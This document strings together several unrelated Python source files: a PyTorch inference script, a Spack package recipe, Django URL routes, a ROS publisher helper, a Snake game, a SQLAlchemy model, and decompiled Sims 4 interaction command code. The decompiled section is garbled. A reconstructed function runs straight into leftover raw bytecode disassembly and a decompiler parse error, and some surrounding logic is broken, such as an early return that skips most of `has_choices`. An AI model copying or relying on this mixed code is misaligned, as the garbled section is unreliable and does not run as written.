# remove the original from the duplicate list if it is there
finding.original_finding.remove(real_original)
super(Finding, finding).save()
if counter <= 0:
# Maximum recursion depth as safety method to circumvent recursion here
return
for f in finding.original_finding.all():
# for all duplicates set the original as their original, get rid of self in between
f.duplicate_finding = real_original
super(Finding, f).save()
super(Finding, real_original).save()
removeLoop(f.id, counter - 1)
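# Illustrative maintenance loop (an assumption; the import path depends on how
# this module is installed):
#   remaining = fix_loop_duplicates()
#   while remaining:
#       remaining = fix_loop_duplicates()  # repeat until no transitive duplicates are left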
|
from __future__ import print_function
import os
import os.path as osp
import sys
import time
import argparse
import torch
import torch.nn as nn
import torch.utils.data as data
import numpy as np
import numpy.linalg as LA
from scipy.io import loadmat
from rnn import *
from cnn import *
import config as cfg
def default_loader(path, number):
c3d_data = []
for index in range(number-2, number+3):
index = min(max(index, 1), 3332)
mat = loadmat(osp.join(path, str(index).zfill(5)+'.mat'))
c3d_data.append(mat['fusion'].astype(np.float32))
c3d_data = np.array(c3d_data, dtype=np.float32)
c3d_data = (c3d_data-0.5)/0.5
c3d_data = c3d_data[np.newaxis, ...]
rnn_data = c3d_data[0,2,:].copy()
norm = LA.norm(rnn_data, axis=0)
rnn_data /= norm[None, :]
return c3d_data, rnn_data
class DataLayer(data.Dataset):
def __init__(self, data_root, sessions, loader=default_loader):
self.data_root = data_root
self.sessions = sessions
self.loader = loader
self.inputs = []
for session_name in self.sessions:
session_path = osp.join(self.data_root, 'target', session_name+'.txt')
            with open(session_path, 'r') as f:
                session_data = f.read().splitlines()
self.inputs.extend(session_data)
def __getitem__(self, index):
data_path, number, air_target, bed_target = self.inputs[index].split()
c3d_data, rnn_data = self.loader(osp.join(
self.data_root, 'slices_mat_64x64', data_path), int(number))
c3d_data, rnn_data = torch.from_numpy(c3d_data), torch.from_numpy(rnn_data)
air_target = np.array(air_target.split(','), dtype=np.float32)
air_target = torch.from_numpy(air_target)
bed_target = np.array(bed_target.split(','), dtype=np.float32)
bed_target = torch.from_numpy(bed_target)
return c3d_data, rnn_data, air_target, bed_target, data_path
def __len__(self):
return len(self.inputs)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
parser.add_argument('--batch_size', default=1, type=int)
parser.add_argument('--num_workers', default=0, type=int)
parser.add_argument('--c3d_pth', default='pretrained_models/c3d.pth', type=str)
parser.add_argument('--rnn_pth', default='pretrained_models/rnn.pth', type=str)
# Victor: add command-line arguments for frames to be run
parser.add_argument('--frms', nargs='+')
# Victor: add output directory for results file
    parser.add_argument('--output_dir', default='NN_TempOutput.txt', type=str)
args = cfg.parse_args(parser)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Victor: open results file to write output to
    file = open(args.output_dir, "w")
data_set = DataLayer(
data_root=args.data_root,
#sessions=args.test_session_set,
        sessions=args.frms,
)
data_loader = data.DataLoader(
data_set,
batch_size=args.batch_size,
num_workers=args.num_workers,
)
c3d_model = C3D().to(device)
c3d_model.load_state_dict(torch.load(args.c3d_pth))
c3d_model.train(False)
rnn_model = RNN().to(device)
rnn_model.load_state_dict(torch.load(args.rnn_pth))
rnn_model.train(False)
air_criterion = nn.L1Loss().to(device)
bed_criterion = nn.L1Loss().to(device)
air_errors = 0.0
bed_errors = 0.0
    frm_init = True
    frm_name = ''
start = time.time()
with torch.set_grad_enabled(False):
for batch_idx, (c3d_data, rnn_data, air_target, bed_target, data_path) in enumerate(data_loader):
c3d_data = c3d_data.to(device)
rnn_data = rnn_data.to(device)
air_target = air_target.to(device)
bed_target = bed_target.to(device)
air_feature, bed_feature = c3d_model.features(c3d_data)
init = torch.cat((air_feature, bed_feature), 1)
air_output, bed_output = rnn_model(rnn_data, init)
# Save these air and bed layer for visualization
air_layer = (air_output.to('cpu').numpy()+1)*412
bed_layer = (bed_output.to('cpu').numpy()+1)*412
# Victor: define frame name
            data_path_mod = data_path[0].replace("/", "_")
            # Victor: write results for surface and bottom layers to text file
            file.write(data_path_mod + '\n')
            for idx in range(0, air_layer.shape[1]):
                file.write(str(air_layer[0, idx]) + ' ')
            file.write('\n')
            for idx in range(0, bed_layer.shape[1]):
                file.write(str(bed_layer[0, idx]) + ' ')
            file.write('\n\n\n')
air_loss = air_criterion(air_output, air_target)
bed_loss = bed_criterion(bed_output, bed_target)
air_errors += air_loss.item()
bed_errors += bed_loss.item()
end = time.time()
# Victor: close file reader
    file.close()
print('Finish all, errors (air): {:4.2f} (bed): {:4.2f}, '
'total running time: {:.2f} sec'.format(
air_errors/len(data_loader.dataset)*412,
bed_errors/len(data_loader.dataset)*412,
end-start,
))
if __name__ == '__main__':
main()
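# Example invocation (session names and the script name are placeholders; see
# config.py for data_root and the other configured arguments):
#   python <script>.py --gpu 0 --batch_size 1 \
#       --frms SESSION_A SESSION_B --output_dir NN_TempOutput.txt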
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RSpem(RPackage):
"""S-system parameter estimation method.
This package can optimize the parameter in S-system models given time
series data"""
homepage = "https://bioconductor.org/packages/SPEM"
git = "https://git.bioconductor.org/packages/SPEM.git"
version('1.24.0', commit='537ed19e466008f2972a246479b327c95177a99e')
version('1.22.0', commit='fddb7cd1f81e47eae603724ea149c2adca5b3eb4')
version('1.20.0', commit='b0e1049c61a35da00882d21026f4c1eb03b17517')
version('1.18.0', commit='3ab425dd9889885eac328d26b73366a875cd250b')
version('1.16.0', commit='9c0a96374086765db9c81e36a662999067fa4cc7')
depends_on('r@2.15.1:', type=('build', 'run'))
depends_on('r-rsolnp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
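    # Illustrative install (standard Spack workflow; versions listed above):
    #   spack install r-spem@1.24.0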
|
from django.urls import path
from .views import *
urlpatterns = [
    path('', indexshow, name='indexshow'),
    path('contact/', contact, name='contact'),
    path('team/', team, name='team'),
    path('about/', about, name='about'),
]
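# Illustrative reverse lookups (assuming Django's django.urls.reverse and the
# names registered above):
#   reverse('contact')  -> '/contact/'
#   reverse('team')     -> '/team/'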
|
"""Class used to group a number of publishers together.
"""
import rospy
class GroupPublisher(list):
"""Used for bundling ROS publishers together and publishing
to these publishers at the same time.
"""
    def __init__(self, iterable=None):
        """Initiate group publisher object.
        Args:
            iterable (list, optional): New list initialized from iterable items.
                Defaults to ``None``, which creates an empty group.
        Raises:
            ValueError: If the input does not only contain ROS publishers.
        """
        # Use None as the default to avoid sharing one mutable list between instances
        if iterable is None:
            iterable = []
        # Validate that the input contains only publisher objects
        if isinstance(iterable, list):
            for publisher in iterable:
                if not isinstance(publisher, rospy.Publisher):
                    raise ValueError(
                        "Please supply a list containing only ros publishers."
                    )
        elif isinstance(iterable, rospy.Publisher):
            # Accept a single publisher by wrapping it in a list
            iterable = [iterable]
        else:
            raise ValueError("Please supply a list containing only ros publishers.")
        super(GroupPublisher, self).__init__(iterable)
def publish(self, messages):
"""Publishes a list of messages to the publishers contained on the
GroupPublisher object. The index of the message corresponds to the
publisher the message will be published to.
Args:
messages (list): List containing the messages to be published.
Raises:
            ValueError: If the group is empty or the number of messages does
                not match the number of publishers.
"""
# Validate input messages
if self.__len__() == 0:
raise ValueError(
"Message could not be published since GroupPublisher "
"contains no publishers."
)
elif self.__len__() > 1 and type(messages) is not list:
raise ValueError(
"Only one message was given while the GroupPublisher object "
"contains %s publishers. Please input a list containing %s ROS "
"messages." % (self.__len__(), self.__len__())
)
elif self.__len__() > 1 and type(messages) is list:
if self.__len__() != len(messages):
raise ValueError(
"%s messages were given while the GroupPublisher object "
"contains %s publishers. Please input a list containing %s ROS "
"messages." % (len(messages), self.__len__(), self.__len__())
)
# Publish messages to the publishers
if type(messages) is not list:
self[0].publish(messages)
else:
            for publisher, message in zip(self, messages):
                publisher.publish(message)
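# Illustrative usage (assumes a running ROS master and an initialized node;
# topic names and message type are placeholders):
#   import rospy
#   from std_msgs.msg import Float64
#   rospy.init_node("group_publisher_demo")
#   pubs = GroupPublisher([rospy.Publisher("a", Float64, queue_size=1),
#                          rospy.Publisher("b", Float64, queue_size=1)])
#   pubs.publish([Float64(1.0), Float64(2.0)])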
|
import copy
class Snake:
def __init__(self, position, direction, length=5, speed=1):
self.length = length
self.speed = speed
self.direction = direction
self.speed_x = 0
self.speed_y = 0
self.set_speeds(direction)
self.position = position
self.delay_counter = 0
self.body = Body(length, self.position[0], self.position[1], self.speed_x, self.speed_y)
self.alive = True
self.apple = None
self.time_since_last_apple = 0
self.score = 0.0
    def set_direction(self, direction):
        # Assumed implementation (the original body was a stub): ignore
        # reversals into the snake's own body, otherwise apply the direction.
        if self.check_is_a_valid_direction(direction):
            self.direction = direction
            self.set_speeds(direction)
def set_apple(self, apple):
self.apple = apple
def check_is_a_valid_direction(self, direction):
segments = self.body.get_segments()
first = segments[0]
second = segments[1]
        if first.position_x == second.position_x and first.position_y > second.position_y:
            if direction == "up":
                return False
        if first.position_x == second.position_x and first.position_y < second.position_y:
            if direction == "down":
                return False
        if first.position_y == second.position_y and first.position_x > second.position_x:
            if direction == "left":
                return False
        if first.position_y == second.position_y and first.position_x < second.position_x:
            if direction == "right":
                return False
return True
def set_speeds(self, direction):
if direction == "left":
self.speed_x = -1
self.speed_y = 0
elif direction == "right":
self.speed_x = 1
self.speed_y = 0
elif direction == "up":
self.speed_x = 0
self.speed_y = -1
elif direction == "down":
self.speed_x = 0
self.speed_y = 1
def update_position(self):
if self.delay_counter == 100 - self.speed:
self.time_since_last_apple += 1
segments = self.body.get_segments()
last_segment = segments.pop(-1)
last_segment.position_x = segments[0].position_x + self.speed_x
last_segment.position_y = segments[0].position_y + self.speed_y
segments.insert(0, last_segment)
self.delay_counter = 0
self.update_score()
else:
self.delay_counter += 1
def get_segments(self):
return self.body.get_segments()
def add_a_segment(self):
self.time_since_last_apple = 0
self.length += 1
self.body.add_a_segment()
self.score += 10
def update_score(self):
segments = self.body.get_segments()
new_head = segments[0]
previous_head = segments[1]
if abs(self.apple.position_x - new_head.position_x) < abs(self.apple.position_x - previous_head.position_x):
self.score += 1
elif abs(self.apple.position_x - new_head.position_x) > abs(self.apple.position_x - previous_head.position_x):
self.score -= 0.5
if abs(self.apple.position_y - new_head.position_y) < abs(self.apple.position_y - previous_head.position_y):
self.score += 1
elif abs(self.apple.position_y - new_head.position_y) > abs(self.apple.position_y - previous_head.position_y):
self.score -= 0.5
class Segment:
def __init__(self, position_x, position_y):
self.position_x = position_x
self.position_y = position_y
class Body:
def __init__(self, length, head_x, head_y, speed_x, speed_y):
self.length = length
self.speed_y = speed_y
self.speed_x = speed_x
self.head_x = head_x
self.head_y = head_y
self.list_of_segments = self.generate_segments()
def generate_segments(self):
list_of_segments = []
for i in range(self.length):
pos_x = self.head_x - i * self.speed_x
pos_y = self.head_y - i * self.speed_y
list_of_segments.append(Segment(pos_x, pos_y))
return list_of_segments
def get_segments(self):
return self.list_of_segments
def add_a_segment(self):
last_segment = self.list_of_segments[-1]
copied_segment = copy.deepcopy(last_segment)
self.list_of_segments.append(copied_segment)
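# Minimal smoke test (an illustrative assumption; the apple only needs
# position_x / position_y attributes for update_score):
if __name__ == "__main__":
    class _FakeApple:
        def __init__(self, x, y):
            self.position_x = x
            self.position_y = y
    snake = Snake(position=(10, 10), direction="right", speed=99)
    snake.set_apple(_FakeApple(15, 10))
    for _ in range(10):
        snake.update_position()
    head = snake.get_segments()[0]
    print("score:", snake.score, "head:", (head.position_x, head.position_y))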
|
from datetime import datetime
from sqlalchemy import (
Column,
ForeignKey,
Integer,
DateTime
)
from sqlalchemy.orm import relationship
from frost.server.database import Base
class Match(Base):
__tablename__ = 'matches'
id = Column(Integer, primary_key=True, nullable=False)
place = Column(Integer, nullable=False)
score = Column(Integer, nullable=False)
timestamp = Column(DateTime, default=datetime.utcnow)
user_id = Column(Integer, ForeignKey('users.id'), nullable=False)
user = relationship('User')
def __repr__(self) -> str:
return (
f'<{type(self).__name__} id={self.id!r} user_id={self.user_id!r} '
f'score={self.score!r} place={self.place!r}>'
)
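# Illustrative usage (assumes a session created from frost's engine/Base setup):
#   match = Match(place=1, score=42, user_id=some_user.id)
#   session.add(match)
#   session.commit()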
|
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\server_commands\interaction_commands.py
# Compiled at: 2020-08-28 23:32:04
# Size of source mod 2**32: 73695 bytes
from protocolbuffers import InteractionOps_pb2 as interaction_protocol, Sims_pb2 as protocols, Consts_pb2
from protocolbuffers.DistributorOps_pb2 import Operation
from clubs import club_tuning
from clubs.club_enums import ClubRuleEncouragementStatus
from distributor.ops import GenericProtocolBufferOp
from distributor.rollback import ProtocolBufferRollback
from distributor.shared_messages import create_icon_info_msg, IconInfoData
from distributor.system import Distributor
from event_testing.resolver import SingleSimResolver, SingleActorAndObjectResolver, InteractionResolver
from gsi_handlers import posture_graph_handlers
from interactions.choices import ChoiceMenu, toggle_show_interaction_failure_reason
from interactions.context import InteractionContext
from interactions.priority import Priority
from interactions.utils.enum_utils import FlagField
from objects import ALL_HIDDEN_REASONS
from objects.pools import pool_utils
from postures import posture_graph
from server.config_service import ContentModes
from server.pick_info import PickInfo, PickType, PICK_USE_TERRAIN_OBJECT, PICK_NEVER_USE_POOL
from server_commands.argument_helpers import get_optional_target, OptionalTargetParam, RequiredTargetParam, TunableInstanceParam
from sims.phone_tuning import PhoneTuning
from sims4.commands import Output
from sims4.localization import TunableLocalizedStringFactory, create_tokens
from sims4.tuning.tunable import TunableResourceKey
from terrain import get_water_depth
from world.ocean_tuning import OceanTuning
import gsi_handlers.sim_handlers_log, autonomy.content_sets, build_buy, enum, interactions.social.social_mixer_interaction, interactions.utils.outcome, objects.terrain, postures.transition_sequence, routing, services, sims4.commands, sims4.log, sims4.reload, telemetry_helper
logger = sims4.log.Logger('Interactions')
TELEMETRY_GROUP_PIE_MENU = 'PIEM'
TELEMETRY_HOOK_CREATE_PIE_MENU = 'PIEM'
writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_PIE_MENU)
with sims4.reload.protected(globals()):
_show_interaction_tuning_name = False
_show_front_page_score = False
class InteractionCommandsTuning:
INTERACTION_TUNING_NAME = TunableLocalizedStringFactory(description='\n The localized string used to create interaction choice names and\n display the tuning name next to it.\n ')
INTERACTION_FRONT_PAGE_SCORING = TunableLocalizedStringFactory(description='\n The localized string used to create interaction choice names and\n front page scoring.\n ')
def _active_sim(client):
if client:
return client.active_sim
@sims4.commands.Command('interactions.posture_graph_build', 'posture_graph.build')
def build_posture_graph(_connection=None):
services.current_zone().posture_graph_service.rebuild()
@sims4.commands.Command('interactions.posture_graph_export', 'posture_graph.export')
def export_posture_graph(_connection=None):
services.current_zone().posture_graph_service.export()
@sims4.commands.Command('interactions.posture_graph_gsi_min_progress', 'posture_graph.gsi_min_progress')
def posture_graph_min_gsi_progress(min_progress: int=0, _connection=None):
posture_graph_handlers.gsi_min_progress = min_progress
@sims4.commands.Command('interactions.show_interaction_tuning_name', command_type=(sims4.commands.CommandType.DebugOnly))
def show_interaction_tuning_name(enable: bool=None, _connection=None):
global _show_interaction_tuning_name
if enable is None:
enable = not _show_interaction_tuning_name
_show_interaction_tuning_name = enable
@sims4.commands.Command('interactions.show_front_page_score', command_type=(sims4.commands.CommandType.DebugOnly))
def show_front_page_score(enable: bool=None, _connection=None):
global _show_front_page_score
if enable is None:
enable = not _show_front_page_score
_show_front_page_score = enable
sims4.commands.output('show_front_page_score: {}.'.format(_show_front_page_score), _connection)
@sims4.commands.Command('interactions.show_failure_reason')
def show_interaction_failure_reason(enable: bool=None, _connection=None):
toggle_show_interaction_failure_reason(enable=enable)
@sims4.commands.Command('interactions.has_choices', command_type=(sims4.commands.CommandType.Live))
def has_choices(target_id: int=None, pick_type: PickType=PickType.PICK_TERRAIN, x: float=0.0, y: float=0.0, z: float=0.0, lot_id: int=0, level: int=0, control: int=0, alt: int=0, shift: int=0, reference_id: int=0, is_routable: bool=True, _connection=None):
if target_id is None:
return
zone = services.current_zone()
client = services.client_manager().get(_connection)
if client is None:
return
sim = _active_sim(client)
shift_held = bool(shift)
if shift_held:
cheat_service = services.get_cheat_service()
        if cheat_service.cheats_enabled:
_send_interactable_message(client, target_id, True, interactable_flags=(interaction_protocol.Interactable.INTERACTABLE))
else:
_send_interactable_message(client, target_id, False)
else:
return
situation_manager = services.get_zone_situation_manager()
for situation in situation_manager.get_all():
if situation.disabled_interaction_tooltip is not None and situation.is_sim_in_situation(sim):
return
position = sims4.math.Vector3(x, y, z)
pick_target = zone.find_object(target_id)
    pick_target, pick_type, potential_targets = _get_targets_from_pick(sim, pick_target, pick_type, position, level, zone.id, lot_id,
        is_routable, preferred_objects=set())
is_interactable = False
if pick_target is not None:
tutorial_service = services.get_tutorial_service()
alt_bool = bool(alt)
control_bool = bool(control)
for potential_target, routing_surface in potential_targets:
pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
lot_id=lot_id,
level=level,
alt=alt_bool,
control=control_bool,
shift=shift_held)
context = client.create_interaction_context(sim, pick=pick)
for aop in potential_target.potential_interactions(context):
if tutorial_service is not None:
if not tutorial_service.is_affordance_visible(aop.affordance):
continue
else:
result = ChoiceMenu.is_valid_aop(aop, context, user_pick_target=potential_target)
if not result:
if not result.tooltip:
continue
is_interactable = aop.affordance.allow_user_directed
                    is_interactable = is_interactable or aop.affordance.has_pie_menu_sub_interactions(
                        aop.target, context, **aop.interaction_parameters)
if is_interactable:
break
if sim is not None:
for si in sim.si_state:
potential_mixer_targets = si.get_potential_mixer_targets()
for potential_mixer_target in potential_mixer_targets:
if potential_target is potential_mixer_target:
break
if potential_mixer_target.is_part and potential_mixer_target.part_owner is potential_target:
break
else:
continue
if autonomy.content_sets.any_content_set_available(sim, (si.super_affordance),
si, context, potential_targets=(potential_target,), include_failed_aops_with_tooltip=True):
is_interactable = True
break
else:
continue
        if not is_interactable:
            # the decompiler emitted "is_interactable or ..." here, which would
            # crash on attribute access; the intent is to check for fires only
            # when nothing interactable was found yet
            fire_service = services.get_fire_service()
            if fire_service.fire_is_active:
                fires = fire_service.get_fires_in_potential_targets(potential_targets)
                if fires:
                    potential_target = fires[0]
                    pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
                        lot_id=lot_id,
                        level=level,
                        alt=alt_bool,
                        control=control_bool,
                        shift=shift_held)
                    context = client.create_interaction_context(sim, pick=pick)
                    for aop in potential_target.potential_interactions(context):
                        if not aop.affordance.allow_user_directed:
                            continue
                        result = ChoiceMenu.is_valid_aop(aop, context, user_pick_target=potential_target)
                        if result:
                            is_interactable = True
                            break
interactable_flags = _get_interactable_flags(pick_target, is_interactable)
_send_interactable_message(client, target_id, is_interactable, True, interactable_flags=interactable_flags)
def _send_interactable_message(client, target_id, is_interactable, immediate=False, interactable_flags=0):
msg = interaction_protocol.Interactable()
msg.object_id = target_id
msg.is_interactable = is_interactable
msg.interactable_flags = interactable_flags
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_OBJECT_IS_INTERACTABLE, msg, immediate)
def _get_interactable_flags(target, is_interactable):
if target is None:
return 0
elif is_interactable:
interactable_flag_field = FlagField(interaction_protocol.Interactable.INTERACTABLE)
else:
interactable_flag_field = FlagField()
target.modify_interactable_flags(interactable_flag_field)
return interactable_flag_field.flags
class PieMenuActions(enum.Int, export=False):
SHOW_PIE_MENU = 0
SHOW_DEBUG_PIE_MENU = 1
INTERACTION_QUEUE_FULL_TOOLTIP = 2
INTERACTION_QUEUE_FULL_STR = TunableLocalizedStringFactory(description="\n Tooltip string shown to the user instead of a pie menu when the Sim's queue\n is full of interactions.\n ")
POSTURE_INCOMPATIBLE_ICON = TunableResourceKey(description='\n Icon to be displayed when pie menu option is not compatible with\n current posture of the sim.\n ',
resource_types=(sims4.resources.CompoundTypes.IMAGE))
def should_generate_pie_menu(client, sim, shift_held):
can_queue_interactions = sim is None or sim.queue is None or sim.queue.can_queue_visible_interaction()
if shift_held:
cheat_service = services.get_cheat_service()
        if cheat_service.cheats_enabled:
return PieMenuActions.SHOW_DEBUG_PIE_MENU
if can_queue_interactions:
return PieMenuActions.SHOW_PIE_MENU
return PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
else:
if can_queue_interactions:
return PieMenuActions.SHOW_PIE_MENU
return PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
def _get_targets_from_pick(sim, pick_target, pick_type, position, level, zone_id, lot_id, is_routable, preferred_objects=None):
    # Reconstructed from the uncompyle6 disassembly that replaced this function
    # ("This code section failed"); control flow follows the listed bytecode.
    # The dump is truncated at offset 688, so the final append and the return
    # value are assumptions based on the unpacking at the call site above.
    potential_targets = []
    pool_block_id = 0
    if sim is not None and pick_type not in PICK_NEVER_USE_POOL and build_buy.is_location_pool(position, level):
        routing_surface = routing.SurfaceIdentifier(zone_id, level, routing.SurfaceType.SURFACETYPE_POOL)
        pool_block_id = build_buy.get_block_id(sim.zone_id, position, level - 1)
    else:
        routing_surface = routing.SurfaceIdentifier(zone_id, level, routing.SurfaceType.SURFACETYPE_WORLD)
    if pick_type in PICK_USE_TERRAIN_OBJECT:
        location = sims4.math.Location(sims4.math.Transform(position), routing_surface)
        terrain_point = objects.terrain.TerrainPoint(location)
        pick_target = terrain_point
        water_height = get_water_depth(position.x, position.z, level)
        if lot_id and lot_id != services.active_lot_id():
            pick_type = PickType.PICK_TERRAIN
            potential_targets.append((pick_target, routing_surface))
        elif pool_block_id:
            pool = pool_utils.get_pool_by_block_id(pool_block_id)
            if pool is not None:
                pool_point = objects.terrain.PoolPoint(location, pool)
                pick_target = pool_point
                potential_targets.append((pool_point, routing_surface))
        elif water_height > 0 and sim is not None:
            if services.terrain_service.ocean_object() is not None:
                if not is_routable:
                    return (None, None, ())
                wading_interval = OceanTuning.get_actor_wading_interval(sim)
                if wading_interval is not None and water_height > wading_interval.upper_bound:
                    ocean_surface = routing.SurfaceIdentifier(zone_id, level, routing.SurfaceType.SURFACETYPE_POOL)
                    ocean_location = location.clone(routing_surface=ocean_surface)
                    ocean_point = objects.terrain.OceanPoint(ocean_location)
                    potential_targets.append((ocean_point, ocean_surface))
                    pick_target = ocean_point
                else:
                    potential_targets.append((terrain_point, routing_surface))
            else:
                water_terrain_object_cache = services.object_manager().water_terrain_object_cache
                nearest_obj = water_terrain_object_cache.get_nearest_object(position)
                if nearest_obj is not None:
                    pick_target = nearest_obj
                    potential_targets.append((pick_target, pick_target.routing_surface))
        else:
            potential_targets.append((terrain_point, routing_surface))
    elif lot_id and lot_id != services.active_lot_id():
        location = sims4.math.Location(sims4.math.Transform(position), routing_surface)
        pick_target = objects.terrain.TerrainPoint(location)
        pick_type = PickType.PICK_TERRAIN
        potential_targets.append((pick_target, routing_surface))
    elif pick_target is not None and pick_target.provided_routing_surface is not None and not pick_target.is_routing_surface_overlapped_at_position(position):
        potential_targets.append((pick_target, routing_surface))
        new_routing_surface = pick_target.provided_routing_surface
        location = sims4.math.Location(sims4.math.Transform(position), new_routing_surface)
        if sim is not None and not posture_graph.is_object_mobile_posture_compatible(pick_target) and routing.test_connectivity_math_locations(sim.location, location, sim.routing_context):
            pick_target = objects.terrain.TerrainPoint(location)
            potential_targets.append((pick_target, new_routing_surface))  # assumed completion; the disassembly is truncated here
    return pick_target, pick_type, potential_targets  # assumed from the unpacking at the call site
690 LOAD_FAST 'pick_target'
692 LOAD_FAST 'new_routing_surface'
694 BUILD_TUPLE_2 2
696 CALL_METHOD_1 1 '1 positional argument'
698 POP_TOP
700 JUMP_FORWARD 726 'to 726'
702_0 COME_FROM 586 '586'
702_1 COME_FROM 574 '574'
702_2 COME_FROM 562 '562'
L. 444 702 LOAD_FAST 'preferred_objects'
704 LOAD_METHOD add
706 LOAD_FAST 'pick_target'
708 CALL_METHOD_1 1 '1 positional argument'
710 POP_TOP
L. 445 712 LOAD_FAST 'potential_targets'
714 LOAD_METHOD append
716 LOAD_FAST 'pick_target'
718 LOAD_FAST 'routing_surface'
720 BUILD_TUPLE_2 2
722 CALL_METHOD_1 1 '1 positional argument'
724 POP_TOP
726_0 COME_FROM 700 '700'
726_1 COME_FROM 670 '670'
726_2 COME_FROM 650 '650'
726_3 COME_FROM 638 '638'
726_4 COME_FROM 554 '554'
L. 447 726 LOAD_FAST 'pick_target'
728 LOAD_CONST None
730 COMPARE_OP is
732_734 POP_JUMP_IF_FALSE 740 'to 740'
L. 448 736 LOAD_CONST (None, None, ())
738 RETURN_VALUE
740_0 COME_FROM 732 '732'
L. 450 740 LOAD_FAST 'pick_target'
742 LOAD_ATTR provides_terrain_interactions
744_746 POP_JUMP_IF_FALSE 796 'to 796'
L. 451 748 LOAD_GLOBAL sims4
750 LOAD_ATTR math
752 LOAD_METHOD Location
754 LOAD_GLOBAL sims4
756 LOAD_ATTR math
758 LOAD_METHOD Transform
760 LOAD_FAST 'position'
762 CALL_METHOD_1 1 '1 positional argument'
764 LOAD_FAST 'routing_surface'
766 CALL_METHOD_2 2 '2 positional arguments'
768 STORE_FAST 'location'
L. 452 770 LOAD_GLOBAL objects
772 LOAD_ATTR terrain
774 LOAD_METHOD TerrainPoint
776 LOAD_FAST 'location'
778 CALL_METHOD_1 1 '1 positional argument'
780 STORE_FAST 'terrain_target'
L. 453 782 LOAD_FAST 'potential_targets'
784 LOAD_METHOD append
786 LOAD_FAST 'terrain_target'
788 LOAD_FAST 'routing_surface'
790 BUILD_TUPLE_2 2
792 CALL_METHOD_1 1 '1 positional argument'
794 POP_TOP
796_0 COME_FROM 744 '744'
L. 455 796 LOAD_FAST 'pick_target'
798 LOAD_ATTR provides_ocean_interactions
800_802 POP_JUMP_IF_FALSE 882 'to 882'
L. 456 804 LOAD_GLOBAL sims4
806 LOAD_ATTR math
808 LOAD_METHOD Location
810 LOAD_GLOBAL sims4
812 LOAD_ATTR math
814 LOAD_METHOD Transform
816 LOAD_FAST 'position'
818 CALL_METHOD_1 1 '1 positional argument'
820 LOAD_FAST 'routing_surface'
822 CALL_METHOD_2 2 '2 positional arguments'
824 STORE_FAST 'location'
L. 457 826 LOAD_GLOBAL routing
828 LOAD_METHOD SurfaceIdentifier
830 LOAD_FAST 'zone_id'
832 LOAD_FAST 'level'
834 LOAD_GLOBAL routing
836 LOAD_ATTR SurfaceType
838 LOAD_ATTR SURFACETYPE_POOL
840 CALL_METHOD_3 3 '3 positional arguments'
842 STORE_FAST 'ocean_surface'
L. 458 844 LOAD_FAST 'location'
846 LOAD_ATTR clone
848 LOAD_FAST 'ocean_surface'
850 LOAD_CONST ('routing_surface',)
852 CALL_FUNCTION_KW_1 1 '1 total positional and keyword args'
854 STORE_FAST 'ocean_location'
L. 459 856 LOAD_GLOBAL objects
858 LOAD_ATTR terrain
860 LOAD_METHOD OceanPoint
862 LOAD_FAST 'ocean_location'
864_0 COME_FROM 460 '460'
864 CALL_METHOD_1 1 '1 positional argument'
866 STORE_FAST 'ocean_point'
L. 460 868 LOAD_FAST 'potential_targets'
870 LOAD_METHOD append
872 LOAD_FAST 'ocean_point'
874 LOAD_FAST 'ocean_surface'
876 BUILD_TUPLE_2 2
878 CALL_METHOD_1 1 '1 positional argument'
880 POP_TOP
882_0 COME_FROM 800 '800'
882_1 COME_FROM 476 '476'
L. 462 882 LOAD_FAST 'pick_target'
884 LOAD_FAST 'pick_type'
886 LOAD_GLOBAL tuple
888 LOAD_FAST 'potential_targets'
890 CALL_FUNCTION_1 1 '1 positional argument'
892 BUILD_TUPLE_3 3
894 RETURN_VALUE
-1 RETURN_LAST
Parse error at or near `COME_FROM' instruction at offset 462_1
@sims4.commands.Command('interactions.choices', command_type=(sims4.commands.CommandType.Live))
def generate_choices(target_id: int=None, pick_type: PickType=PickType.PICK_TERRAIN, x: float=0.0, y: float=0.0, z: float=0.0, lot_id: int=0, level: int=0, control: int=0, alt: int=0, shift: int=0, reference_id: int=0, referred_object_id: int=0, preferred_object_id: int=0, is_routable: bool=True, _connection=None):
if not alt:
if control:
return 0
if target_id is None:
return 0
zone = services.current_zone()
client = services.client_manager().get(_connection)
sim = _active_sim(client)
shift_held = bool(shift)
context = None
choice_menu = ChoiceMenu(sim)
pick_target = zone.find_object(target_id)
preferred_object = None
if preferred_object_id is not None:
preferred_object = services.object_manager().get(preferred_object_id)
preferred_objects = set() if preferred_object is None else {preferred_object}
pie_menu_action = should_generate_pie_menu(client, sim, shift_held)
show_pie_menu = pie_menu_action == PieMenuActions.SHOW_PIE_MENU
show_debug_pie_menu = pie_menu_action == PieMenuActions.SHOW_DEBUG_PIE_MENU
suppress_social_front_page = False
scoring_gsi_handler = {} if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled else None
if show_pie_menu or show_debug_pie_menu:
if pick_type == PickType.PICK_PORTRAIT or pick_type == PickType.PICK_CLUB_PANEL:
sim_info = services.sim_info_manager().get(target_id)
if sim_info is None:
return 0
if sim is None:
return 0
picked_item_ids = set([target_id])
context = client.create_interaction_context(sim, target_sim_id=target_id)
context.add_preferred_objects(preferred_objects)
potential_interactions = list(sim.potential_relation_panel_interactions(context, picked_item_ids=picked_item_ids))
choice_menu.add_potential_aops(sim_info, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
elif pick_type == PickType.PICK_SKEWER:
sim_info = services.sim_info_manager().get(target_id)
skewer_sim = None
if sim_info is None:
return 0
skewer_sim = sim_info.get_sim_instance()
context = client.create_interaction_context(skewer_sim)
